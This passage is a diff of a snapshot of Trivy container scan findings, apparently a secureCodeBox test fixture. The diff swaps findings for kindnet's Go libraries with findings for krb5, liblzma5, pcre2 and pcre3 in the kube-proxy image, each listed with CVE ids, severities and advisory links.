"https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", - "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", - "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", - "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", - "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", - "https://pkg.go.dev/vuln/GO-2021-0053", - "https://security.netapp.com/advisory/ntap-20210219-0006/", - "https://www.cve.org/CVERecord?id=CVE-2021-3121", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the "skippy peanut butter" issue.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3121", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3121", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-c3h9-896r-86jm", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "5.2.5-2.1~deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "5.2.5-2", + "packageName": "liblzma5", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", + ], + }, + "category": "Vulnerability", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "arbitrary-file-write vulnerability", + "references": [ { "type": "URL", - "value": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0053", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0006/", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3121", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20201216223049-8b5274cf687f", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-29652", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-29652", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", - "https://errata.almalinux.org/8/ALSA-2021-1796.html", - "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", - "https://go-review.googlesource.com/c/crypto/+/278852", - "https://go.dev/cl/278852", - "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", - "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", - "https://linux.oracle.com/cve/CVE-2020-29652.html", - "https://linux.oracle.com/errata/ELSA-2021-1796.html", - "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", - "https://pkg.go.dev/vuln/GO-2021-0227", - "https://www.cve.org/CVERecord?id=CVE-2020-29652", - ], - }, - "category": "Vulnerability", - "description": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.0-20201203163018-be400aefbc4c for Go allows remote attackers to cause a denial of service against SSH servers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-29652", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-29652", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-1796.html", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, { "type": "URL", - "value": "https://go-review.googlesource.com/c/crypto/+/278852", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "https://go.dev/cl/278852", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-29652.html", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1796.html", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0227", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-29652", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20211202192323-5770296d904e", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-43565", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1586", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-43565", - "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", - "https://go.dev/cl/368814/", - "https://go.dev/issues/49932", - "https://groups.google.com/forum/#!forum/golang-announce", - "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", - "https://pkg.go.dev/vuln/GO-2022-0968", - "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "https://access.redhat.com/errata/RHSA-2022:5809", + "https://access.redhat.com/security/cve/CVE-2022-1586", + "https://bugzilla.redhat.com/2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "https://errata.rockylinux.org/RLSA-2022:5809", + "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "https://linux.oracle.com/cve/CVE-2022-1586.html", + "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1586", ], }, "category": "Vulnerability", - "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang.org/x/crypto: empty plaintext packet causes panic", + "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43565", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43565", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", - }, - { - "type": "URL", - "value": "https://go.dev/cl/368814/", - }, - { - "type": "URL", - "value": "https://go.dev/issues/49932", - }, - { - "type": "URL", - "value": "https://groups.google.com/forum/#!forum/golang-announce", + "value": "https://avd.aquasec.com/nvd/cve-2022-1586", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "value": "https://access.redhat.com/errata/RHSA-2022:5809", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "value": "https://access.redhat.com/security/cve/CVE-2022-1586", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0968", + "value": "https://bugzilla.redhat.com/2077976", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", - ], - }, - "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://errata.rockylinux.org/RLSA-2022:5809", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1587", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-1587", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "https://linux.oracle.com/cve/CVE-2022-1587.html", + "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1587", + ], + }, + "category": "Vulnerability", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-1587", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://access.redhat.com/security/cve/CVE-2022-1587", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20210520170846-37e1c6afe023", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-33194", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-11164", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33194", - "https://github.com/advisories/GHSA-83g2-8m93-v3w7", - "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", - "https://go.dev/cl/311090", - "https://go.dev/issue/46288", - "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", - "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", - "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", - "https://pkg.go.dev/vuln/GO-2021-0238", - "https://www.cve.org/CVERecord?id=CVE-2021-33194", + "http://openwall.com/lists/oss-security/2017/07/11/3", + "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "http://www.securityfocus.com/bid/99575", + "https://access.redhat.com/security/cve/CVE-2017-11164", + 